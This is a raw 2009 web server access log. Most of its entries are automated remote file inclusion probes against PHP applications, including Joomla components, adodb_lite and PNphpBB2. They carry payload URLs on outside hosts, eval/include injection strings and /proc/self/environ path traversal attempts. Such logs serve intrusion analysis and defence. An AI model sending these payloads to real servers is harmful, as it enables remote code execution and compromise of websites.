222.122.142.249 - - [20/Jun/2009:02:33:21 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:33:24 -0400] "GET /logs/access_log.Q109060600%20%20//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:33:24 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:33:24 -0400] "GET //e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.122.142.249 - - [20/Jun/2009:02:34:12 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:02:34:30 -0400] "GET /logs/access_log.Q109051600//?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jun/2009:02:34:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.8.66.19 - - [20/Jun/2009:02:34:31 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:34:31 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:34:36 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:02:34:48 -0400] "GET /logs/access_log.Q109051000//errors.php?error=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.15.254.22 - - [20/Jun/2009:02:34:53 -0400] "GET /logs/access_log.Q109052400//errors.php?error=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:35:21 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:35:21 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:35:21 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:35:30 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:35:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.portalsana.com.br/SiJi?? HTTP/1.1" 200 6242 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:35:40 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:35:54 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:35:56 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:36:02 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:36:25 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:02:36:39 -0400] "GET /logs/access_log.Q109052500//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.149.163.198 - - [20/Jun/2009:02:36:55 -0400] "GET /logs/access_log.Q109060700//class/class.dashboard_cms.php?where_framework=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
62.149.163.198 - - [20/Jun/2009:02:36:55 -0400] "GET /logs/access_log.Q109060700/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
62.149.163.198 - - [20/Jun/2009:02:36:56 -0400] "GET /logs/access_log.Q109060700//class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
62.149.163.198 - - [20/Jun/2009:02:36:56 -0400] "GET /logs/access_log.Q109060700//class/class.dashboard_cms.php?where_framework=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
210.8.66.19 - - [20/Jun/2009:02:37:18 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:37:18 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:37:18 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:37:29 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [20/Jun/2009:02:37:29 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [20/Jun/2009:02:37:29 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 212 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.17.162.28 - - [20/Jun/2009:02:37:43 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:02:37:43 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
85.17.162.28 - - [20/Jun/2009:02:37:43 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
210.8.66.19 - - [20/Jun/2009:02:38:30 -0400] "GET /logs/access_log.Q109051300/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:39:23 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:39:23 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:39:23 -0400] "GET /logs/access_log.Q109061300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:02:39:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.194.87.219 - - [20/Jun/2009:02:40:33 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
210.115.58.73 - - [20/Jun/2009:02:40:34 -0400] "GET /logs/access_log.Q109052000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:40:34 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:40:35 -0400] "GET /logs/access_log.Q109060600%20%20/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [20/Jun/2009:02:40:38 -0400] "GET /images/home_welcome_bkgrd4.jpg HTTP/1.1" 200 438 "-" "Googlebot-Image/1.0"
222.122.160.145 - - [20/Jun/2009:02:40:49 -0400] "GET /logs/error_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
82.194.87.219 - - [20/Jun/2009:02:41:40 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
210.8.66.19 - - [20/Jun/2009:02:42:07 -0400] "GET /logs/access_log.Q109060600%20%20/e404.php?DOCUMENT_ROOT=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:02:42:15 -0400] "GET /logs/access_log.Q109052400//components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:42:15 -0400] "GET //components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
222.122.160.145 - - [20/Jun/2009:02:42:16 -0400] "GET /logs//components/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.6.17.151 - - [20/Jun/2009:02:42:50 -0400] "GET /logs/access_log.Q108122400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.115.58.73 - - [20/Jun/2009:02:42:57 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:42:57 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:42:57 -0400] "GET /logs/access_log.Q109061300%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
116.125.126.72 - - [20/Jun/2009:02:43:28 -0400] "GET /logs/error_log.Q109052100/index.php?_SERVER[DOCUMENT_ROOT]=http://vpk66.ru/images/stories/idd.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
210.8.66.19 - - [20/Jun/2009:02:43:36 -0400] "GET /logs/access_log.Q109050800//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:02:43:40 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:02:43:40 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:02:43:40 -0400] "GET /logs/access_log.Q109052800%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:02:43:45 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
210.8.66.19 - - [20/Jun/2009:02:43:47 -0400] "GET /logs/access_log.Q109051300//e404.php?INCLUDE_FOLDER=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:44:16 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
210.115.58.73 - - [20/Jun/2009:02:44:16 -0400] "GET /logs/access_log.Q109052000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bestcursos.com.br/admin/s/id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:02:44:19 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:02:44:19 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:02:44:21 -0400] "GET /logs/access_log.Q109052800%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:02:44:23 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jun/2009:02:44:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.11.230.36 - - [20/Jun/2009:02:44:45 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.11.230.36 - - [20/Jun/2009:02:44:51 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.122.160.145 - - [20/Jun/2009:02:45:14 -0400] "GET /logs/access_log.Q109061200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://colegiopenacorada.com/xoops_lib/modules/pw.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
67.208.139.72 - - [20/Jun/2009:02:45:26 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.208.139.72 - - [20/Jun/2009:02:45:26 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.208.139.72 - - [20/Jun/2009:02:45:26 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.208.139.72 - - [20/Jun/2009:02:45:30 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
68.109.233.157 - - [20/Jun/2009:02:45:35 -0400] "GET /logs/access_log.Q109051300%20//e404.php?INCLUDE_FOLDER=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
69.73.164.205 - - [20/Jun/2009:02:46:25 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
69.73.164.205 - - [20/Jun/2009:02:46:25 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:46:28 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:46:28 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:46:28 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:46:29 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:46:54 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:46:54 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:46:58 -0400] "GET /logs/access_log.Q109052500/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:47:14 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:02:47:19 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:02:47:19 -0400] "GET /logs/access_log.Q109051300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:02:47:19 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
124.138.156.3 - - [20/Jun/2009:02:47:19 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:47:27 -0400] "GET /index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:47:27 -0400] "GET /logs/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:47:27 -0400] "GET /logs/access_log.Q109051100%20%20/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:34 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:35 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:35 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:35 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:35 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:36 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:47:38 -0400] "GET /logs/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:47:38 -0400] "GET /index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
83.222.193.94 - - [20/Jun/2009:02:47:38 -0400] "GET /logs/access_log.Q109051100%20%20/index.php?lg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:42 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.117.128.143 - - [20/Jun/2009:02:47:49 -0400] "GET /logs/access_log.Q109060600%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.162.28 - - [20/Jun/2009:02:47:57 -0400] "GET /logs/error_log.Q109053100/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.italiaiuta.org/docs/Conf?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
